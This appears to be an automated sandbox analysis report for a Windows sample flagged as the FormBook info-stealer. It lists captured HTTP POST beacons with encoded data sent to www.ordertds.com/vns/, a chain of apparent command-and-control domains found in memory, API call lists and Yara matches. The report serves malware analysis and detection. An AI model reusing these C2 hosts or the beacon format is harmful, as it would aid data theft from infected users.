Source: global traffic	HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).
Source: global traffic	HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 188725Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 48 55 57 6f 74 6b 64 78 4c 38 4d 73 73 56 4c 75 37 68 53 7a 5f 53 78 70 54 6f 45 6e 6c 4d 33 71 61 73 6e 30 6a 49 58 38 59 6b 41 68 36 6c 42 77 65 31 58 67 33 77 78 31 54 39 5f 7e 37 50 51 78 70 79 6f 78 59 65 43 44 71 33 53 7a 6f 32 76 33 64 39 53 54 53 77 45 4b 73 5a 47 77 79 52 5f 37 37 44 78 4c 30 66 73 59 34 61 34 77 38 35 46 64 38 75 6b 45 42 33 75 65 43 75 55 32 36 51 4f 68 4f 6a 78 54 46 68 5f 69 4f 4a 76 62 42 4d 34 69 59 48 73 67 68 55 76 30 73 74 77 35 2d 6f 38 76 4d 31 39 6b 37 57 63 6a 70 42 35 34 71 75 71 43 38 58 75 78 68 77 6d 75 4c 4e 69 78 2d 73 6a 38 30 54 6e 4b 77 61 53 44 31 71 66 77 73 28 57 32 2d 74 39 7a 77 33 6a 4d 75 4e 59 36 37 36 59 52 67 39 55 34 71 78 69 4e 54 47 61 4c 43 45 50 4b 67 71 30 61 51 76 4c 4b 41 56 49 77 75 6c 48 72 54 49 4d 75 61 59 49 69 4a 47 77 59 38 46 37 4f 49 38 32 72 4f 61 38 77 6a 62 4d 76 39 4f 31 33 43 36 7a 30 4d 43 41 39 48 42 42 38 36 4f 49 59 4a 48 47 6c 51 38 72 70 42 51 79 50 5f 74 6f 38 70 58 44 37 75 38 62 51 68 63 74 4f 36 45 4f 47 32 41 6c 76 7a 36 35 4a 70 71 44 67 45 67 32 54 54 61 74 57 36 71 49 35 4d 66 61 73 38 69 78 34 65 55 61 66 38 76 6f 53 47 6e 5a 72 37 56 56 4f 73 69 65 62 2d 45 48 47 47 50 30 78 41 47 35 75 46 46 7a 41 76 72 58 76 70 65 77 7a 7a 54 44 64 43 77 34 63 55 63 7a 67 31 31 6d 59 64 56 58 36 56 74 53 30 36 6d 55 37 75 75 6d 50 70 37 30 67 43 51 62 55 6e 57 47 4a 73 31 41 72 36 42 4f 70 6b 78 65 79 4b 50 68 5a 35 52 50 6d 6b 32 4d 72 6d 6b 43 76 2d 43 75 77 6e 51 35 6e 51 69 72 66 48 52 52 6f 33 64 4a 32 7a 41 4e 53 52 63 65 63 4f 5a 57 46 64 55 46 54 44 43 78 7a 6f 68 72 74 2d 39 74 46 33 72 76 7e 77 30 47 67 72 73 76 4c 44 4b 39 64 4f 4d 4f 58 78 43 34 6c 50 6b 55 48 56 33 43 49 6c 46 35 4e 49 39 68 47 34 46 51 4b 67 28 57 52 4c 72 71 31 4e 31 70 38 51 76 54 73 38 31 6c 4e 5a 4c 30 73 44 54 63 73 66 6c 55 28 70 59 4f 28 6d 78 42 70 76 46 7a 42 65 73 32 6b 52 65 5f 34 4c 4c 4a 58 51 64 62 69 6b 56 4f 48 49 34 37 55 44 47 51 55 31 32 35 49 63 28 74 77 5f 78 53 37 67 6f 46 49 66 55 6f 75 30 35 73 79 53 74 35 45 6a 48 6f 38 36 68 2d 61 42 61 50 35 77 6c 4d 77 6c 34 31 35 46 75 4d 75 32 49 6b 43 2d 59 57 41 70 52 31 31 49 35 4a 33 52 62 75 4b 64 53 45 33 50 59 41 37 36 39 74 31 61 45 4d 58 61 57 46 56 77 76 51 42 42 44 66 6e 30 55 41 28 6b 65 38 36 6b 4d 70 6f 6f 6d 38 76 67 6c 43 73 61 41 55 4f 50 5a 61 6d 70 48 45 62 79 74 49 6f 6b 68 49 42 46 73 4c 78 76 50 6d 57 5a 74 48 42 78 4e 79 53 34 68 41 49 57 7a 57 4d 70 37 53 59 7a 6f 48 6a 79 72 7a 61 37 42 50 62 77 63 2d 4a 39 76 64 4f 39 61 79 32 2d 77 35 53 6a 4d 36 69 35 61 4f 58 6d 30 54 43 77 6

Source: C:\Windows\explorer.exe

Code function: 19_2_065C0782 getaddrinfo,setsockopt,recv,

19_2_065C0782

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.ordertds.com

Source: unknown

HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).

Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: changelog.txt.0.dr	String found in binary or memory: http://groups.google.com/group/lyricwiki-api/browse_thread/thread/733ccd919d654040
Source: changelog.txt.0.dr	String found in binary or memory: http://lyrics.wikia.com
Source: changelog.txt.0.dr	String found in binary or memory: http://lyrics.wikia.com.
Source: focus.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: focus.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: changelog.txt.0.dr	String found in binary or memory: http://skwire.dcmembers.com/fp/?page=trout
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoE
Source: OptimFROG.dll.0.dr	String found in binary or memory: http://www.LosslessAudio.org2
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.comReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.autohotkey.com/forum/topic69642.html
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com/vns/www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net/vns/www.milkweedmagic.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.netReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/DcUpdaterSetup.exe
Source: changelog.txt.0.dr	String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/dcuhelper.zip
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com/vns/www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com/vns/www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design/vns/M
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.designReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space/vns/www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.spaceReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: changelog.txt.0.dr	String found in binary or memory: http://www.last.fm/api/submissions#subs
Source: changelog.txt.0.dr	String found in binary or memory: http://www.lyricwiki.org
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com/vns/www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.comReferer:
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpG
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpL
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehph
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMhh
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpu
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehpz
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com/vns/www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.comReferer:
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com/vns/www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: changelog.txt.0.dr	String found in binary or memory: http://www.site.com/music/song.mp3.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com/vns/www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com/vns/www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com/vns/www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.comReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.wikia.com/wiki/Wikia.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com/vns/www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com/vns/www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/=CLMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0ow1
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0owM
Source: wscript.exe, 00000018.00000002.467023538.000000000558F000.00000004.00000001.sdmp	String found in binary or memory: https://www.ordertds.com/vns/?BlP=7

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
